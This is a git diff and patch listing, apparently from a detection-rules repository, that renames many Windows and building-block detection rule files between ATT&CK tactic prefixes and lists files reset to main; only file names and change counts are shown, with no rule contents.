diff --git a/rules/windows/defense_evasion_suspicious_execution_from_vscode_extension.toml b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml
similarity index 100%
rename from rules/windows/defense_evasion_suspicious_execution_from_vscode_extension.toml
rename to rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml
diff --git a/rules/windows/execution_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml
similarity index 100%
rename from rules/windows/execution_suspicious_ms_exchange_worker_child_process.toml
rename to rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml
diff --git a/rules/windows/defense_evasion_suspicious_ms_office_child_process.toml b/rules/windows/initial_access_suspicious_ms_office_child_process.toml
similarity index 100%
rename from rules/windows/defense_evasion_suspicious_ms_office_child_process.toml
rename to rules/windows/initial_access_suspicious_ms_office_child_process.toml
diff --git a/rules/windows/execution_suspicious_ms_outlook_child_process.toml b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml
similarity index 100%
rename from rules/windows/execution_suspicious_ms_outlook_child_process.toml
rename to rules/windows/initial_access_suspicious_ms_outlook_child_process.toml
diff --git a/rules/windows/defense_evasion_suspicious_windows_server_update_svc.toml b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml
similarity index 100%
rename from rules/windows/defense_evasion_suspicious_windows_server_update_svc.toml
rename to rules/windows/initial_access_suspicious_windows_server_update_svc.toml
diff --git a/rules/windows/defense_evasion_url_cve_2025_33053.toml b/rules/windows/initial_access_url_cve_2025_33053.toml
similarity index 100%
rename from rules/windows/defense_evasion_url_cve_2025_33053.toml
rename to rules/windows/initial_access_url_cve_2025_33053.toml
diff --git a/rules/windows/execution_via_explorer_suspicious_child_parent_args.toml b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml
similarity index 100%
rename from rules/windows/execution_via_explorer_suspicious_child_parent_args.toml
rename to rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml
diff --git a/rules/windows/execution_webshell_screenconnect_server.toml b/rules/windows/initial_access_webshell_screenconnect_server.toml
similarity index 100%
rename from rules/windows/execution_webshell_screenconnect_server.toml
rename to rules/windows/initial_access_webshell_screenconnect_server.toml
diff --git a/rules/windows/defense_evasion_xsl_script_execution_via_com.toml b/rules/windows/initial_access_xsl_script_execution_via_com.toml
similarity index 100%
rename from rules/windows/defense_evasion_xsl_script_execution_via_com.toml
rename to rules/windows/initial_access_xsl_script_execution_via_com.toml
diff --git a/rules/windows/defense_evasion_alternate_creds_pth.toml b/rules/windows/lateral_movement_alternate_creds_pth.toml
similarity index 100%
rename from rules/windows/defense_evasion_alternate_creds_pth.toml
rename to rules/windows/lateral_movement_alternate_creds_pth.toml
diff --git a/rules/windows/execution_cmd_service.toml b/rules/windows/lateral_movement_cmd_service.toml
similarity index 100%
rename from rules/windows/execution_cmd_service.toml
rename to rules/windows/lateral_movement_cmd_service.toml
diff --git a/rules/windows/defense_evasion_dcom_mmc20.toml b/rules/windows/lateral_movement_dcom_mmc20.toml
similarity index 100%
rename from rules/windows/defense_evasion_dcom_mmc20.toml
rename to rules/windows/lateral_movement_dcom_mmc20.toml
diff --git a/rules/windows/execution_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml
similarity index 100%
rename from rules/windows/execution_dcom_shellwindow_shellbrowserwindow.toml
rename to rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml
diff --git a/rules/windows/execution_incoming_wmi.toml b/rules/windows/lateral_movement_incoming_wmi.toml
similarity index 100%
rename from rules/windows/execution_incoming_wmi.toml
rename to rules/windows/lateral_movement_incoming_wmi.toml
diff --git a/rules/windows/defense_evasion_rdp_enabled_registry.toml b/rules/windows/lateral_movement_rdp_enabled_registry.toml
similarity index 100%
rename from rules/windows/defense_evasion_rdp_enabled_registry.toml
rename to rules/windows/lateral_movement_rdp_enabled_registry.toml
diff --git a/rules/windows/execution_remote_services.toml b/rules/windows/lateral_movement_remote_services.toml
similarity index 100%
rename from rules/windows/execution_remote_services.toml
rename to rules/windows/lateral_movement_remote_services.toml
diff --git a/rules/windows/execution_remote_task_creation_winlog.toml b/rules/windows/lateral_movement_remote_task_creation_winlog.toml
similarity index 100%
rename from rules/windows/execution_remote_task_creation_winlog.toml
rename to rules/windows/lateral_movement_remote_task_creation_winlog.toml
diff --git a/rules/windows/execution_scheduled_task_target.toml b/rules/windows/lateral_movement_scheduled_task_target.toml
similarity index 100%
rename from rules/windows/execution_scheduled_task_target.toml
rename to rules/windows/lateral_movement_scheduled_task_target.toml
diff --git a/rules/windows/initial_access_unusual_dns_service_children.toml b/rules/windows/lateral_movement_unusual_dns_service_children.toml
similarity index 100%
rename from rules/windows/initial_access_unusual_dns_service_children.toml
rename to rules/windows/lateral_movement_unusual_dns_service_children.toml
diff --git a/rules/windows/initial_access_unusual_dns_service_file_writes.toml b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml
similarity index 100%
rename from rules/windows/initial_access_unusual_dns_service_file_writes.toml
rename to rules/windows/lateral_movement_unusual_dns_service_file_writes.toml
diff --git a/rules/windows/execution_via_wsus_update.toml b/rules/windows/lateral_movement_via_wsus_update.toml
similarity index 100%
rename from rules/windows/execution_via_wsus_update.toml
rename to rules/windows/lateral_movement_via_wsus_update.toml
diff --git a/rules/windows/defense_evasion_evasion_hidden_local_account_creation.toml b/rules/windows/persistence_evasion_hidden_local_account_creation.toml
similarity index 100%
rename from rules/windows/defense_evasion_evasion_hidden_local_account_creation.toml
rename to rules/windows/persistence_evasion_hidden_local_account_creation.toml
diff --git a/rules/windows/defense_evasion_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml
similarity index 100%
rename from rules/windows/defense_evasion_evasion_registry_startup_shell_folder_modified.toml
rename to rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml
diff --git a/rules/windows/defense_evasion_msi_installer_task_startup.toml b/rules/windows/persistence_msi_installer_task_startup.toml
similarity index 100%
rename from rules/windows/defense_evasion_msi_installer_task_startup.toml
rename to rules/windows/persistence_msi_installer_task_startup.toml
diff --git a/rules/windows/defense_evasion_sdprop_exclusion_dsheuristics.toml b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml
similarity index 100%
rename from rules/windows/defense_evasion_sdprop_exclusion_dsheuristics.toml
rename to rules/windows/persistence_sdprop_exclusion_dsheuristics.toml
diff --git a/rules/windows/defense_evasion_services_registry.toml b/rules/windows/persistence_services_registry.toml
similarity index 100%
rename from rules/windows/defense_evasion_services_registry.toml
rename to rules/windows/persistence_services_registry.toml
diff --git a/rules/windows/execution_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml
similarity index 100%
rename from rules/windows/execution_suspicious_scheduled_task_runtime.toml
rename to rules/windows/persistence_suspicious_scheduled_task_runtime.toml
diff --git a/rules/windows/execution_system_shells_via_services.toml b/rules/windows/persistence_system_shells_via_services.toml
similarity index 100%
rename from rules/windows/execution_system_shells_via_services.toml
rename to rules/windows/persistence_system_shells_via_services.toml
diff --git a/rules/windows/execution_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml
similarity index 100%
rename from rules/windows/execution_temp_scheduled_task.toml
rename to rules/windows/persistence_temp_scheduled_task.toml
diff --git a/rules/windows/defense_evasion_via_bits_job_notify_command.toml b/rules/windows/persistence_via_bits_job_notify_command.toml
similarity index 100%
rename from rules/windows/defense_evasion_via_bits_job_notify_command.toml
rename to rules/windows/persistence_via_bits_job_notify_command.toml
diff --git a/rules/windows/defense_evasion_via_hidden_run_key_valuename.toml b/rules/windows/persistence_via_hidden_run_key_valuename.toml
similarity index 100%
rename from rules/windows/defense_evasion_via_hidden_run_key_valuename.toml
rename to rules/windows/persistence_via_hidden_run_key_valuename.toml
diff --git a/rules/windows/execution_via_wmi_stdregprov_run_services.toml b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml
similarity index 100%
rename from rules/windows/execution_via_wmi_stdregprov_run_services.toml
rename to rules/windows/persistence_via_wmi_stdregprov_run_services.toml
diff --git a/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml b/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml
similarity index 100%
rename from rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml
rename to rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml
diff --git a/rules/windows/execution_webshell_detection.toml b/rules/windows/persistence_webshell_detection.toml
similarity index 100%
rename from rules/windows/execution_webshell_detection.toml
rename to rules/windows/persistence_webshell_detection.toml
diff --git a/rules/windows/initial_access_account_takeover_mixed_logon_types.toml b/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml
similarity index 100%
rename from rules/windows/initial_access_account_takeover_mixed_logon_types.toml
rename to rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml
diff --git a/rules/windows/persistence_badsuccessor_dmsa_abuse.toml b/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml
similarity index 100%
rename from rules/windows/persistence_badsuccessor_dmsa_abuse.toml
rename to rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml
diff --git a/rules/windows/defense_evasion_create_process_as_different_user.toml b/rules/windows/privilege_escalation_create_process_as_different_user.toml
similarity index 100%
rename from rules/windows/defense_evasion_create_process_as_different_user.toml
rename to rules/windows/privilege_escalation_create_process_as_different_user.toml
diff --git a/rules/windows/defense_evasion_create_process_with_token_unpriv.toml b/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml
similarity index 100%
rename from rules/windows/defense_evasion_create_process_with_token_unpriv.toml
rename to rules/windows/privilege_escalation_create_process_with_token_unpriv.toml
diff --git a/rules/windows/persistence_credroaming_ldap.toml b/rules/windows/privilege_escalation_credroaming_ldap.toml
similarity index 100%
rename from rules/windows/persistence_credroaming_ldap.toml
rename to rules/windows/privilege_escalation_credroaming_ldap.toml
diff --git a/rules/windows/defense_evasion_disable_uac_registry.toml b/rules/windows/privilege_escalation_disable_uac_registry.toml
similarity index 100%
rename from rules/windows/defense_evasion_disable_uac_registry.toml
rename to rules/windows/privilege_escalation_disable_uac_registry.toml
diff --git a/rules/windows/persistence_dmsa_creation_by_unusual_user.toml b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml
similarity index 100%
rename from rules/windows/persistence_dmsa_creation_by_unusual_user.toml
rename to rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml
diff --git a/rules/windows/persistence_dns_serverlevelplugindll.toml b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml
similarity index 100%
rename from rules/windows/persistence_dns_serverlevelplugindll.toml
rename to rules/windows/privilege_escalation_dns_serverlevelplugindll.toml
diff --git a/rules/windows/defense_evasion_expired_driver_loaded.toml b/rules/windows/privilege_escalation_expired_driver_loaded.toml
similarity index 100%
rename from rules/windows/defense_evasion_expired_driver_loaded.toml
rename to rules/windows/privilege_escalation_expired_driver_loaded.toml
diff --git a/rules/windows/persistence_gpo_schtask_service_creation.toml b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml
similarity index 100%
rename from rules/windows/persistence_gpo_schtask_service_creation.toml
rename to rules/windows/privilege_escalation_gpo_schtask_service_creation.toml
diff --git a/rules/windows/persistence_group_policy_iniscript.toml b/rules/windows/privilege_escalation_group_policy_iniscript.toml
similarity index 100%
rename from rules/windows/persistence_group_policy_iniscript.toml
rename to rules/windows/privilege_escalation_group_policy_iniscript.toml
diff --git a/rules/windows/execution_group_policy_scheduled_task.toml b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml
similarity index 100%
rename from rules/windows/execution_group_policy_scheduled_task.toml
rename to rules/windows/privilege_escalation_group_policy_scheduled_task.toml
diff --git a/rules/windows/defense_evasion_krbrelayup_service_creation.toml b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml
similarity index 100%
rename from rules/windows/defense_evasion_krbrelayup_service_creation.toml
rename to rules/windows/privilege_escalation_krbrelayup_service_creation.toml
diff --git a/rules/windows/persistence_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml
similarity index 100%
rename from rules/windows/persistence_lsa_auth_package.toml
rename to rules/windows/privilege_escalation_lsa_auth_package.toml
diff --git a/rules/windows/defense_evasion_make_token_local.toml b/rules/windows/privilege_escalation_make_token_local.toml
similarity index 100%
rename from rules/windows/defense_evasion_make_token_local.toml
rename to rules/windows/privilege_escalation_make_token_local.toml
diff --git a/rules/windows/defense_evasion_newcreds_logon_rare_process.toml b/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml
similarity index 100%
rename from rules/windows/defense_evasion_newcreds_logon_rare_process.toml
rename to rules/windows/privilege_escalation_newcreds_logon_rare_process.toml
diff --git a/rules/windows/persistence_port_monitor_print_processor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml
similarity index 100%
rename from rules/windows/persistence_port_monitor_print_processor_abuse.toml
rename to rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml
diff --git a/rules/windows/defense_evasion_posh_token_impersonation.toml b/rules/windows/privilege_escalation_posh_token_impersonation.toml
similarity index 100%
rename from rules/windows/defense_evasion_posh_token_impersonation.toml
rename to rules/windows/privilege_escalation_posh_token_impersonation.toml
diff --git a/rules/windows/defense_evasion_printspooler_suspicious_file_deletion.toml b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml
similarity index 100%
rename from rules/windows/defense_evasion_printspooler_suspicious_file_deletion.toml
rename to rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml
diff --git a/rules/windows/persistence_reg_service_imagepath_mod.toml b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml
similarity index 100%
rename from rules/windows/persistence_reg_service_imagepath_mod.toml
rename to rules/windows/privilege_escalation_reg_service_imagepath_mod.toml
diff --git a/rules/windows/execution_service_control_spawned_script_int.toml b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml
similarity index 100%
rename from rules/windows/execution_service_control_spawned_script_int.toml
rename to rules/windows/privilege_escalation_service_control_spawned_script_int.toml
diff --git a/rules/windows/initial_access_takeover_new_source_ip.toml b/rules/windows/privilege_escalation_takeover_new_source_ip.toml
similarity index 100%
rename from rules/windows/initial_access_takeover_new_source_ip.toml
rename to rules/windows/privilege_escalation_takeover_new_source_ip.toml
diff --git a/rules/windows/defense_evasion_tokenmanip_sedebugpriv_enabled.toml b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml
similarity index 100%
rename from rules/windows/defense_evasion_tokenmanip_sedebugpriv_enabled.toml
rename to rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml
diff --git a/rules/windows/defense_evasion_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml
similarity index 100%
rename from rules/windows/defense_evasion_uac_bypass_com_clipup.toml
rename to rules/windows/privilege_escalation_uac_bypass_com_clipup.toml
diff --git a/rules/windows/defense_evasion_uac_bypass_com_ieinstal.toml b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml
similarity index 100%
rename from rules/windows/defense_evasion_uac_bypass_com_ieinstal.toml
rename to rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml
diff --git a/rules/windows/defense_evasion_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml
similarity index 100%
rename from rules/windows/defense_evasion_uac_bypass_com_interface_icmluautil.toml
rename to rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml
diff --git a/rules/windows/defense_evasion_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
similarity index 100%
rename from rules/windows/defense_evasion_uac_bypass_diskcleanup_hijack.toml
rename to rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
diff --git a/rules/windows/defense_evasion_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml
similarity index 100%
rename from rules/windows/defense_evasion_uac_bypass_dll_sideloading.toml
rename to rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml
diff --git a/rules/windows/defense_evasion_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
similarity index 100%
rename from rules/windows/defense_evasion_uac_bypass_event_viewer.toml
rename to rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
diff --git a/rules/windows/defense_evasion_uac_bypass_mock_windir.toml b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml
similarity index 100%
rename from rules/windows/defense_evasion_uac_bypass_mock_windir.toml
rename to rules/windows/privilege_escalation_uac_bypass_mock_windir.toml
diff --git a/rules/windows/defense_evasion_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml
similarity index 100%
rename from rules/windows/defense_evasion_uac_bypass_winfw_mmc_hijack.toml
rename to rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml
diff --git a/rules/windows/defense_evasion_unusual_parentchild_relationship.toml b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml
similarity index 100%
rename from rules/windows/defense_evasion_unusual_parentchild_relationship.toml
rename to rules/windows/privilege_escalation_unusual_parentchild_relationship.toml
diff --git a/rules/windows/defense_evasion_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml
similarity index 100%
rename from rules/windows/defense_evasion_unusual_svchost_childproc_childless.toml
rename to rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml
diff --git a/rules/windows/defense_evasion_via_token_theft.toml b/rules/windows/privilege_escalation_via_token_theft.toml
similarity index 100%
rename from rules/windows/defense_evasion_via_token_theft.toml
rename to rules/windows/privilege_escalation_via_token_theft.toml
diff --git a/rules/windows/persistence_windows_service_via_unusual_client.toml b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml
similarity index 100%
rename from rules/windows/persistence_windows_service_via_unusual_client.toml
rename to rules/windows/privilege_escalation_windows_service_via_unusual_client.toml
diff --git a/rules_building_block/defense_evasion_bitsadmin_activity.toml b/rules_building_block/command_and_control_bitsadmin_activity.toml
similarity index 100%
rename from rules_building_block/defense_evasion_bitsadmin_activity.toml
rename to rules_building_block/command_and_control_bitsadmin_activity.toml
diff --git a/rules_building_block/initial_access_entra_id_risk_detection_signal.toml b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml
similarity index 100%
rename from rules_building_block/initial_access_entra_id_risk_detection_signal.toml
rename to rules_building_block/credential_access_entra_id_risk_detection_signal.toml
diff --git a/rules_building_block/defense_evasion_mdmp_file_unusual_extension.toml b/rules_building_block/credential_access_mdmp_file_unusual_extension.toml
similarity index 100%
rename from rules_building_block/defense_evasion_mdmp_file_unusual_extension.toml
rename to rules_building_block/credential_access_mdmp_file_unusual_extension.toml
diff --git a/rules_building_block/execution_download_susp_extension.toml b/rules_building_block/defense_evasion_download_susp_extension.toml
similarity index 100%
rename from rules_building_block/execution_download_susp_extension.toml
rename to rules_building_block/defense_evasion_download_susp_extension.toml
diff --git a/rules_building_block/execution_injection_from_msoffice.toml b/rules_building_block/defense_evasion_injection_from_msoffice.toml
similarity index 100%
rename from rules_building_block/execution_injection_from_msoffice.toml
rename to rules_building_block/defense_evasion_injection_from_msoffice.toml
diff --git a/rules_building_block/execution_outlook_suspicious_child.toml b/rules_building_block/defense_evasion_outlook_suspicious_child.toml
similarity index 100%
rename from rules_building_block/execution_outlook_suspicious_child.toml
rename to rules_building_block/defense_evasion_outlook_suspicious_child.toml
diff --git a/rules_building_block/persistence_service_path_registry.toml b/rules_building_block/defense_evasion_service_path_registry.toml
similarity index 100%
rename from rules_building_block/persistence_service_path_registry.toml
rename to rules_building_block/defense_evasion_service_path_registry.toml
diff --git a/rules_building_block/persistence_services_exe_path.toml b/rules_building_block/defense_evasion_services_exe_path.toml
similarity index 100%
rename from rules_building_block/persistence_services_exe_path.toml
rename to rules_building_block/defense_evasion_services_exe_path.toml
diff --git a/rules_building_block/persistence_write_dac_access.toml b/rules_building_block/defense_evasion_write_dac_access.toml
similarity index 100%
rename from rules_building_block/persistence_write_dac_access.toml
rename to rules_building_block/defense_evasion_write_dac_access.toml
diff --git a/rules_building_block/credential_access_capnetraw_capability.toml b/rules_building_block/discovery_capnetraw_capability.toml
similarity index 100%
rename from rules_building_block/credential_access_capnetraw_capability.toml
rename to rules_building_block/discovery_capnetraw_capability.toml
diff --git a/rules_building_block/persistence_linux_modprobe_enumeration.toml b/rules_building_block/discovery_linux_modprobe_enumeration.toml
similarity index 100%
rename from rules_building_block/persistence_linux_modprobe_enumeration.toml
rename to rules_building_block/discovery_linux_modprobe_enumeration.toml
diff --git a/rules_building_block/defense_evasion_linux_sysctl_enumeration.toml b/rules_building_block/discovery_linux_sysctl_enumeration.toml
similarity index 100%
rename from rules_building_block/defense_evasion_linux_sysctl_enumeration.toml
rename to rules_building_block/discovery_linux_sysctl_enumeration.toml
diff --git a/rules_building_block/persistence_github_new_event_action_for_pat.toml b/rules_building_block/execution_github_new_event_action_for_pat.toml
similarity index 100%
rename from rules_building_block/persistence_github_new_event_action_for_pat.toml
rename to rules_building_block/execution_github_new_event_action_for_pat.toml
diff --git a/rules_building_block/collection_github_new_repo_interaction_for_pat.toml b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml
similarity index 100%
rename from rules_building_block/collection_github_new_repo_interaction_for_pat.toml
rename to rules_building_block/execution_github_new_repo_interaction_for_pat.toml
diff --git a/rules_building_block/collection_github_new_repo_interaction_for_user.toml b/rules_building_block/execution_github_new_repo_interaction_for_user.toml
similarity index 100%
rename from rules_building_block/collection_github_new_repo_interaction_for_user.toml
rename to rules_building_block/execution_github_new_repo_interaction_for_user.toml
diff --git a/rules_building_block/resource_development_github_repo_created.toml b/rules_building_block/execution_github_repo_created.toml
similarity index 100%
rename from rules_building_block/resource_development_github_repo_created.toml
rename to rules_building_block/execution_github_repo_created.toml
diff --git a/rules_building_block/collection_github_repo_interaction_from_new_ip.toml b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml
similarity index 100%
rename from rules_building_block/collection_github_repo_interaction_from_new_ip.toml
rename to rules_building_block/execution_github_repo_interaction_from_new_ip.toml
diff --git a/rules_building_block/defense_evasion_settingcontent_ms_file_creation.toml b/rules_building_block/execution_settingcontent_ms_file_creation.toml
similarity index 100%
rename from rules_building_block/defense_evasion_settingcontent_ms_file_creation.toml
rename to rules_building_block/execution_settingcontent_ms_file_creation.toml
diff --git a/rules_building_block/execution_anomalous_rsc_flight_data_patterns.toml b/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml
similarity index 100%
rename from rules_building_block/execution_anomalous_rsc_flight_data_patterns.toml
rename to rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml
diff --git a/rules_building_block/defense_evasion_github_new_ip_address_for_pat.toml b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml
similarity index 100%
rename from rules_building_block/defense_evasion_github_new_ip_address_for_pat.toml
rename to rules_building_block/initial_access_github_new_ip_address_for_pat.toml
diff --git a/rules_building_block/credential_access_okta_admin_console_login_failure.toml b/rules_building_block/initial_access_okta_admin_console_login_failure.toml
similarity index 100%
rename from rules_building_block/credential_access_okta_admin_console_login_failure.toml
rename to rules_building_block/initial_access_okta_admin_console_login_failure.toml
diff --git a/rules_building_block/execution_at.toml b/rules_building_block/lateral_movement_at.toml
similarity index 100%
rename from rules_building_block/execution_at.toml
rename to rules_building_block/lateral_movement_at.toml
diff --git a/rules_building_block/execution_posh_winrm_activity.toml b/rules_building_block/lateral_movement_posh_winrm_activity.toml
similarity index 100%
rename from rules_building_block/execution_posh_winrm_activity.toml
rename to rules_building_block/lateral_movement_posh_winrm_activity.toml
diff --git a/rules_building_block/execution_unusual_process_sql_accounts.toml b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml
similarity index 100%
rename from rules_building_block/execution_unusual_process_sql_accounts.toml
rename to rules_building_block/lateral_movement_unusual_process_sql_accounts.toml
diff --git a/rules_building_block/execution_wmic_remote.toml b/rules_building_block/lateral_movement_wmic_remote.toml
similarity index 100%
rename from rules_building_block/execution_wmic_remote.toml
rename to rules_building_block/lateral_movement_wmic_remote.toml
diff --git a/rules_building_block/defense_evasion_github_new_pat_for_user.toml b/rules_building_block/persistence_github_new_pat_for_user.toml
similarity index 100%
rename from rules_building_block/defense_evasion_github_new_pat_for_user.toml
rename to rules_building_block/persistence_github_new_pat_for_user.toml
diff --git a/rules_building_block/initial_access_web_server_potential_sql_injection.toml b/rules_building_block/persistence_web_server_potential_sql_injection.toml
similarity index 100%
rename from rules_building_block/initial_access_web_server_potential_sql_injection.toml
rename to rules_building_block/persistence_web_server_potential_sql_injection.toml
diff --git a/rules_building_block/defense_evasion_sts_getsessiontoken_abuse.toml b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml
similarity index 100%
rename from rules_building_block/defense_evasion_sts_getsessiontoken_abuse.toml
rename to rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml
From 0042eb1179768107c05f70ebec1b33a117748d9b Mon Sep 17 00:00:00 2001
From: Mika Ayenson
Date: Tue, 24 Mar 2026 12:33:23 -0500
Subject: [PATCH 09/16] reset rules to main
---
 rules/apm/apm_403_response_to_a_post.toml | 16 +-
 .../apm_405_response_method_not_allowed.toml | 16 +-
 rules/apm/apm_sqlmap_user_agent.toml | 21 +-
 ...mmand_and_control_common_llm_endpoint.toml | 24 +-
 ...rol_curl_wget_spawn_via_nodejs_parent.toml | 23 +-
 ...nai_process_suspicious_tld_connection.toml | 10 +-
 ..._control_genai_process_unusual_domain.toml | 18 +-
 ...nd_control_suricata_elastic_defend_c2.toml | 9 +-
 .../command_and_control_tunnel_qemu.toml | 11 +-
 ...s_genai_process_sensitive_file_access.toml | 57 ++--
 .../credential_access_gitleaks_execution.toml | 16 +-
 ...redential_access_trufflehog_execution.toml | 16 +-
 ...e_evasion_deleting_websvr_access_logs.toml | 8 +-
 ..._evasion_encoding_rot13_python_script.toml | 13 +-
 ...nse_evasion_genai_config_modification.toml | 36 ++-
 ...n_genai_process_compiling_executables.toml | 43 ++-
 ...ss_encoding_prior_to_network_activity.toml | 46 ++-
 ...se_evasion_missing_events_after_alert.toml | 36 ++-
 ...asion_whitespace_padding_command_line.toml | 40 ++-
 ...y_virtual_machine_fingerprinting_grep.toml | 42 +--
 ..._server_local_file_inclusion_activity.toml | 174 +++++++++++
 ...server_remote_file_inclusion_activity.toml | 135 +++++++++
 .../execution_aws_ec2_lolbin_via_ssm.toml | 44 ++-
 ...rnetes_api_request_by_usual_utilities.toml | 140 +++++++++
 ...ct_interactive_kubernetes_api_request.toml | 144 +++++++++
 ...tes_api_activity_by_unusual_utilities.toml | 164 ++++++++++
 ...ss_followed_by_kubernetes_api_request.toml | 137 +++++++++
 .../execution_git_exploit_cve_2025_48384.toml | 28 +-
 ..._pre_or_post_install_script_execution.toml | 52 +++-
 ...xecution_openclaw_agent_child_process.toml | 64 ++--
 ...on_pentest_eggshell_remote_admin_tool.toml | 20 +-
 ...otential_widespread_malware_infection.toml | 20 +-
 ...ontainer_creation_with_host_reference.toml | 27 +-
 ...cution_register_github_actions_runner.toml | 126 ++++++++
.../execution_revershell_via_shell_cmd.toml | 102 +++++++ .../execution_sap_netweaver_jsp_webshell.toml | 90 ++++++ ...execution_sap_netweaver_webshell_exec.toml | 67 ++--- ...tion_suspicious_java_netcon_childproc.toml | 40 +-- .../execution_via_github_actions_runner.toml | 71 ++--- ...er_tracking_id_tampering_via_env_vars.toml | 163 ++++++++++ ...t_alert_from_a_process_with_cpu_spike.toml | 9 +- .../impact_alerts_on_host_with_cpu_spike.toml | 12 +- ..._access_azure_o365_with_network_alert.toml | 41 +-- ...defend_alert_genai_utility_descendant.toml | 17 +- ...ccess_execution_susp_react_serv_child.toml | 29 +- ...s_exfiltration_new_usb_device_mounted.toml | 29 +- ..._ssl_vpn_login_followed_by_siem_alert.toml | 9 +- ...ial_access_ollama_api_external_access.toml | 30 +- ..._access_zoom_meeting_with_no_passcode.toml | 15 +- ...tiple_alerts_by_host_ip_and_source_ip.toml | 16 +- ...erts_email_elastic_defend_correlation.toml | 25 +- ...le_alerts_llm_compromised_user_triage.toml | 23 +- ...ence_ssh_authorized_keys_modification.toml | 42 ++- ...eb_server_potential_command_injection.toml | 76 ++++- ...lege_escalation_echo_nopasswd_sudoers.toml | 34 +-- ...ation_setuid_setgid_bit_set_via_chmod.toml | 28 +- .../privilege_escalation_trap_execution.toml | 20 +- ..._server_discovery_or_fuzzing_activity.toml | 7 +- ...eb_server_unusual_spike_in_error_logs.toml | 7 +- ...unusual_spike_in_error_response_codes.toml | 7 +- ...ssance_web_server_unusual_user_agents.toml | 33 +- ...collection_cloudtrail_logging_created.toml | 30 +- ...nticated_bucket_access_by_rare_source.toml | 22 +- ...cess_aws_getpassword_for_ec2_instance.toml | 10 +- ...ial_access_iam_user_addition_to_group.toml | 31 +- ...cess_root_console_failure_brute_force.toml | 8 +- ...se_evasion_cloudtrail_logging_deleted.toml | 13 +- ..._evasion_cloudtrail_logging_suspended.toml | 13 +- ...nse_evasion_cloudwatch_alarm_deletion.toml | 12 +- ..._evasion_config_service_rule_deletion.toml | 12 +- 
